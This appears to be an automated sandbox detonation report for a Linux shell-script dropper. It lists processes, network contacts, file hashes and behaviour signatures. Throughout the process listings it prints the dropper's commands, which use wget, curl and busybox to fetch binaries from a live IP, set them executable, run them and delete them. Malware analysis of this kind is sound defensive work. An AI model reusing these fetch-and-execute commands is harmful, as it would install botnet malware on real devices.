/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff

[./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/bin/rm

[rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff]

/usr/bin/wget

[wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/chmod

[chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

[./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/rm

[rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/wget

[wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/chmod

[chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC

[./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/rm

[rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/wget

[wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/chmod

[chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC

[./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/rm

[rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/wget

[wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/chmod

[chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3

[./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/rm

[rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/wget

[wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/chmod

[chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW

[./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/rm

[rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/wget

[wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/chmod

[chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ

[./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/rm

[rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 08:23

Reported

2024-11-21 08:25

Platform

debian9-mipsel-20240611-en

Max time kernel

101s

Max time network

104s

Command Line

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 N/A
N/A /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 N/A
N/A /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci N/A
N/A /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 N/A
N/A /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX N/A
N/A /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ N/A
N/A /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil N/A
N/A /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff N/A
N/A /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 N/A
N/A /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC N/A
N/A /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC N/A
N/A /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 N/A
N/A /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW N/A
N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A
File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /usr/bin/curl N/A
File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /usr/bin/curl N/A
File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A
File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /usr/bin/curl N/A
File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /usr/bin/curl N/A
File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /usr/bin/curl N/A
File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /usr/bin/curl N/A
File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /usr/bin/curl N/A
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A
File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /usr/bin/curl N/A
File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /usr/bin/curl N/A
File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /usr/bin/curl N/A

Processes

/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh

[/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/chmod

[chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

[./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/bin/rm

[rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4]

/usr/bin/wget

[wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/chmod

[chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC

[./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/bin/rm

[rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC]

/usr/bin/wget

[wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/chmod

[chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC

[./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/bin/rm

[rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC]

/usr/bin/wget

[wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/chmod

[chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3

[./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/bin/rm

[rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3]

/usr/bin/wget

[wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/chmod

[chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW

[./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/bin/rm

[rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW]

/usr/bin/wget

[wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/chmod

[chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ

[./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/bin/rm

[rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/chmod

[chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5

[./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/bin/rm

[rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5]

/usr/bin/wget

[wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/chmod

[chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1

[./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/bin/rm

[rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/chmod

[chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci

[./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/bin/rm

[rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci]

/usr/bin/wget

[wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/chmod

[chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463

[./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/bin/rm

[rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463]

/usr/bin/wget

[wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/chmod

[chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX

[./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/bin/rm

[rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX]

/usr/bin/wget

[wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/bin/chmod

[chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ]

/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ

